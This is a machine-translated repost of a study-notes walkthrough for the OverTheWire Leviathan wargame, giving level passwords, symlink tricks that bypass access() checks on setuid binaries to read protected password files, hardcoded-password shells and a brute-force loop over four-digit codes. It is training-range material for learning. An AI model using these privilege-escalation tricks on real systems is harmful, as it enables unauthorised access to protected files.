当前位置:网站首页>Wargames study notes -- Leviathan

Wargames study notes -- Leviathan

2022-07-03 20:05:00 Zhaohg720

Range link :https://overthewire.org/wargames/leviathan/

Level 0

Username: leviathan0
Password: leviathan0

Level 0 --> Level 1


Sign in leviathan0
Home catalog ls -a Found a hidden directory .backup, There is one in the catalog html file
Copy the file locally and open it with a browser , Search for password Found the password 

Not Found
The requested URL /passwordus.html | This will be fixed later, the password for leviathan1 is rioGegei8m was not found on this server.

Apache/2.4.10 (Debian) Server at leviathan.labs.overthewire.org Port 80

Level 1 --> Level 2


Sign in leviathan1
There is an executable file in the home directory check, Password is required for running prompt
direct scp Drag to local ida Look at
Insert picture description here
The key part is to combine the input string with sex compare , If it is successful, it will execute shell
stay password Enter password /bin/sh This shell, Find that you already have leviathan2 Authority , direct cat The password will do 

[email protected]:~$ ./check 
password: sex
$ id  
uid=12002(leviathan2) gid=12001(leviathan1) groups=12001(leviathan1)
$ cat /etc/leviathan_pass/leviathan2    
ougahZi8Ta
$

Level 2 --> Level 3


Sign in leviathan2
The home directory has an executable printfile, You should be able to read the password directly according to the prompt 

[email protected]:~$ ./printfile 
*** File Printer ***
Usage: ./printfile filename
[email protected]:~$ ls -l
total 8
-r-sr-x--- 1 leviathan3 leviathan2 7436 Aug 26  2019 printfile

Directly print password file prompt file without this file , Look at the source code
Insert picture description here

Insert picture description here
The key here is to use access() This function checks the file name and type of the file , So we should bypass this check , Print the input directly , You can create a soft link to a password file , Create a file with spaces at the beginning of the soft link name , And then execute the command ,access() Check is a file ,cat The execution of will be divided into two files cat To password 

mkdir /tmp/leviathan2
cd /tmp/leviathan2
ln -s /etc/leviathan_pass/leviathan3 getpass
touch "getpass 1.txt"
 ~/printfile getpass\ 1.txt

Level 3 --> Level 4


Sign in leviathan4
It is very similar to the previous question
Insert picture description here
What is in the main function , The content is do_stuff() In this function
Insert picture description here
Obviously , The comparison string is snlprintf, The same thing get shell 

./level3 
Enter the password> snlprintf  
[You've got shell]!
$ id
uid=12004(leviathan4) gid=12003(leviathan3) groups=12003(leviathan3)
$ cat /etc/leviathan_pass/leviathan4

Level 4 --> Level 5


Sign in leviathan5
A hidden Directory .trash, There's a bin Executable file 

[email protected]:~$ ls -la
total 24
drwxr-xr-x  3 root root       4096 Aug 26  2019 .
drwxr-xr-x 10 root root       4096 Aug 26  2019 ..
-rw-r--r--  1 root root        220 May 15  2017 .bash_logout
-rw-r--r--  1 root root       3526 May 15  2017 .bashrc
-rw-r--r--  1 root root        675 May 15  2017 .profile
dr-xr-x---  2 root leviathan4 4096 Aug 26  2019 .trash

[email protected]:~/.trash$ ltrace ./bin
__libc_start_main(0x80484bb, 1, 0xffffd774, 0x80485b0 <unfinished ...>
fopen("/etc/leviathan_pass/leviathan5", "r")                                             = 0
+++ exited (status 255) +++
[email protected]:~/.trash$ ./bin 
01010100 01101001 01110100 01101000 00110100 01100011 01101111 01101011 01100101 01101001 00001010

The output of direct execution is the binary of password , as long as 2 Turn into the system ascii Can 

b_password = '01010100 01101001 01110100 01101000 00110100 01100011 01101111 01101011 01100101 01101001 00001010'

list_pasword = b_password.split(' ')

password = []

for i in range(0, len(list_pasword)):
    password += chr(int(list_pasword[i], 2))
    # print(int(list_pasword[i], 2))
print(password)

Level 5 --> Level 6


Sign in leviathan6
There is an executable program , direct ida to glance at
Insert picture description here
It's reading /tmp/file.log The content of the document , This file does not exist . So you can still use the soft link method 

ln -s /etc/leviathan_pass/leviathan6 /tmp/file.log

Direct execution ./leviathan5 Then the password will be displayed

Level 6 --> Level 7


Sign in leviathan6 

[email protected]:~$ ./leviathan6 
usage: ./leviathan6 <4 digit code>

Prompt to add four digits , Obviously want us to explode . Because the file on the target is deleted in a short time, which is inconvenient to operate , So copy the file locally , use shell Script explosion 

#!/bin/bash
for i in {
    1000..9999}
do
	/root/Desktop/leviathan6 $i
	echo $i
done

Wrong
7122
# ^C
# id
uid=0(root) gid=0(root) groups=0(root)
# ^C
#

You can see the execution to 7123 Enter shell, So input directly on the target 7123 then cat The password will do 

[email protected]:~$ ./leviathan6 7123
$ cat /etc/leviathan_pass/leviathan7
原网站

版权声明
本文为[Zhaohg720]所创,转载请带上原文链接,感谢
https://yzsam.com/2022/02/202202150047032902.html

边栏推荐

猜你喜欢

随机推荐